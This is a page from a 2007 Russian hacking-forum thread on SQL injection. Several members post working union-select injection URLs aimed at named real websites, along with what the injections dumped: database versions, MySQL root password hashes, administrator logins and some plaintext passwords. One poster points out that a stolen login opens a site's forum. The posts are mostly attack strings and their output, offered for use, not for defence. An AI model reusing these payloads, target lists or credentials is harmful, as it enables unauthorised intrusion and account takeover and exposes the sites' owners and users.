HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 360 из 1604 « Первая < 260310350 356 357 358 359 360 361 362 363 364 3704104608601360 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #3591  
Старый 08.11.2007, 10:12
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
С нами: 10194175

Репутация: 524
По умолчанию
ildeposito.org
Код:
http://www.ildeposito.org/view.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user())/*
108 таблиц:
Код:
http://www.ildeposito.org/view.php?id=-1+union+select+1,2,3,table_name+from+information_schema.tables+limit+107,1/*
root:
Код:
http://www.ildeposito.org/view.php?id=-1+union+select+1,2,3,concat_ws(0x3a,User,Password)+from+mysql.user/*
root:*8C9EAD7FBDD7E16892FA0D3088DB9E47FAB3FCD3

Интересные таблицы: jos_users, wp_users и др.

israelbasket.com - Израильский Баскетбол
Код:
http://www.israelbasket.com/clubs.php?club=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13/*
4.1.22-standard-log:israelfo_israelfootball:israelfo@localhost
с табами - запарка...
 
Ответить с цитированием

  #3592  
Старый 08.11.2007, 10:41
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами: 10313606

Репутация: 1327
По умолчанию
_http://www.tonnel.ru
mysql - 5 версии, всего в базе присутствует 133 таблицы
Ковычки не фильтруются, НО прав на чтение-запись нету!(
Код:
http://www.tonnel.ru/?l=gzl&uid=-509'+union+select+1,2,3,concat(table_schema,char(58),table_NAME),5,6,7,8,9,10,11,12,13+from+INFORMATION_SCHEMA.tables+limit+x,1/*
вот таблица приглянулась - digest_user
Код:
http://www.tonnel.ru/?l=gzl&uid=-509'+union+select+1,2,3,concat(name,char(58),email,char(58),passwd),5,6,7,8,9,10,11,12,13+from+savinov.digest_user+limit+0,1/*
Максим:admin@tonnel.ru:43957
и - music_user
Код:
http://www.tonnel.ru/?l=gzl&uid=-509'+union+select+1,2,3,concat(username,char(58),email,char(58),passwd),5,6,7,8,9,10,11,12,13+from+savinov.music_user+limit+0,1/*
Максим:admin@tonnel.ru:vermax (под этим логином-паролем можно зайти на форум _http://www.tonnel.ru/board/)
 
Ответить с цитированием

  #3593  
Старый 08.11.2007, 11:02
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
С нами: 10194175

Репутация: 524
По умолчанию
Неожиданно наткнулся ...
lemon64.com - прикольный портальчик
Код:
http://www.lemon64.com/?mainurl=http%3A//www.lemon64.com/reviews/view.php%3Fid%3D-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
Таблица forum_users:
логин, пасс, уровень, мыло, ася, сайт, aim, yim, msnm, occ
Код:
http://www.lemon64.com/?mainurl=http%3A//www.lemon64.com/reviews/view.php%3Fid%3D-1+union+select+1,concat_ws(0x3a,username,user_password,user_level,user_email,user_icq,user_website,user_aim,user_yim,user_msnm,user_occ),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+forum_users+limit+1,1/*
Админ:
Kim Lemon:5967da78a21bd240b87d53bf568e7558
 
Ответить с цитированием

  #3594  
Старый 08.11.2007, 12:31
Elvis000
Постоянный
Регистрация: 23.04.2007
Сообщений: 646
С нами: 10027046

Репутация: 1035


По умолчанию
www.ziegler-film.com

Код:
http://www.ziegler-film.com/de/et/prod.html?lang=EN&ID=9999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
ver: 4.0.24_Debian-10sarge2-log
user: fml@localhost
base: ziegler

прав на чтение mysql.user нет.
 
Ответить с цитированием

  #3595  
Старый 08.11.2007, 14:33
v1ru$
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
С нами: 10080326

Репутация: 576
По умолчанию
Код:
http://portativ.spb.ru/?page=news&id=-19'+union+select+1,2,3,concat(user(),0x3a,database(),0x3a,version()),5,6,7,8/*
5.1.11-beta

Код:
http://portativ.spb.ru/?page=news&id=-19'+union+select+1,2,3,concat(password,0x3a,user),5,6,7,8+from+mysql.user/*
root:*E372920927493C3BCEA6654A14218A59970A3D11:gfhjkm

Юзеры(пароли в чистом виде)
Код:
http://portativ.spb.ru/?page=news&id=-19'+union+select+1,2,3,concat(name,0x3a,passw,0x3a,email,0x3a),5,6,7,8+from+ph_user+limit+700,1/*
thx to F!$T
 
Ответить с цитированием

  #3596  
Старый 08.11.2007, 14:53
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами: 9828237

Репутация: 778
По умолчанию
Код:
http://www.fnazca.com.br/news/news.php?id_news=-1+union+select+aes_decrypt(aes_encrypt(version(),0x71),0x71),2,3,4,5,6,7,8/*
4.1.12-standard-log root:*542F4346222B98A7FB425DC2F817BEBE84DD56AA
Код:
http://www.poloarqdec.com.br/index.php?id=noticias&id_news=-1+union+select+1,2,3,version()/*
4.0.18'-Max'-log
Код:
http://www.somov.com.br/news_ler.php?id_news=-1+union+select+1,version(),user(),4,5,6,7,8/*
5.0.41--log somov@200.234.200.49
Код:
http://www.somov.com.br/news_ler.php?id_news=-1+union+select+1,concat(login,0x3a,senha),3,4,5,6,7,8+from+cad_administrador+limit+0,1/*
andre:mestre usadas:somov fernanda:somovfe ' or 1=1/*:123
Код:
http://www.polmozbyt.krakow.pl/index.php?m=ss&id_ma=1&id_mo=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
4.1.20-log
Код:
http://www.fsb-ae.com/projects/detail.php?id=-1+union+select+1,2,user(),version(),5,6,7,8,9,10,11,12/*&type=Landmarks
frankf4_fsbae@localhost 4.0.25-standard
Код:
http://www.fsb-ae.com/projects/detail.php?id=-1+union+select+1,2,3,concat(name,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12+from+users/*&type=Landmarks
Visual Inventor:06a80fec34e9262b:support@visualinventor.c om итд
Код:
http://ims.edu.in/course_details.aspx?id=1+or+1=@@version--
'Microsoft SQL Server 2000
Код:
http://ims.edu.in/course_details.aspx?id=1%20or%201=(select+top+1+cast(admin_id+as+nvarchar)%2B%27%3A%27%2Bcast(admin_name+as+nvarchar)%2B%27%3A%27%2Bcast(admin_pasword+as+nvarchar)%20from%20tblAdminLogin)--
'1:admin:admin'
 
Ответить с цитированием

  #3597  
Старый 08.11.2007, 15:29
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
С нами: 10194175

Репутация: 524
По умолчанию
dukemednews.org
Код:
http://dukemednews.org/gallery/detail.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/*
4.0.18:news:web@vml-news.duhs.duke.edu

root:
Код:
http://dukemednews.org/gallery/detail.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3,4,5+from+mysql.user/*
root:623460e26f081bbc
 
Ответить с цитированием

  #3598  
Старый 08.11.2007, 16:38
F!$T
Участник форума
Регистрация: 05.02.2007
Сообщений: 142
С нами: 10137926

Репутация: 995
По умолчанию
Код:
http://www.fcdynamo.ru/material.php?id=-651'+union+select+1,concat(login,0x3a,pass),3,4,5,6,7,8+from+users/*
это для фанатов Динам0!
а вот что дальше делать я не понимаю... колонки login pass пустые
 
Ответить с цитированием

  #3599  
Старый 08.11.2007, 17:27
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию
Цитата:
Сообщение от F!$T  
Код:
http://www.fcdynamo.ru/material.php?id=-651'+union+select+1,concat(login,0x3a,pass),3,4,5,6,7,8+from+users/*
это для фанатов Динам0!
а вот что дальше делать я не понимаю... колонки login pass пустые

Это походу не использующаяся табличка

вот нашел:
Код:
http://www.fcdynamo.ru/material.php?id=-651'+union+select+1,concat(login,0x3a,password),3,4,5,6,7,8+from+ut_users/*
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #3600  
Старый 08.11.2007, 19:22
KEHT33
Познающий
Регистрация: 26.11.2006
Сообщений: 49
С нами: 10240623

Репутация: 79
По умолчанию
Мобильные аксесуары
Код HTML:
http://era.in.ua/line3.php?lng=ru&art=-217%20union%20select%201,2,concat(user_login,0x3b,user_passw),4,5,6,7+from+auth_users/*
Скул 5
 
Ответить с цитированием
Ответ
Страница 360 из 1604 « Первая < 260310350 356 357 358 359 360 361 362 363 364 3704104608601360 > Последняя »



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.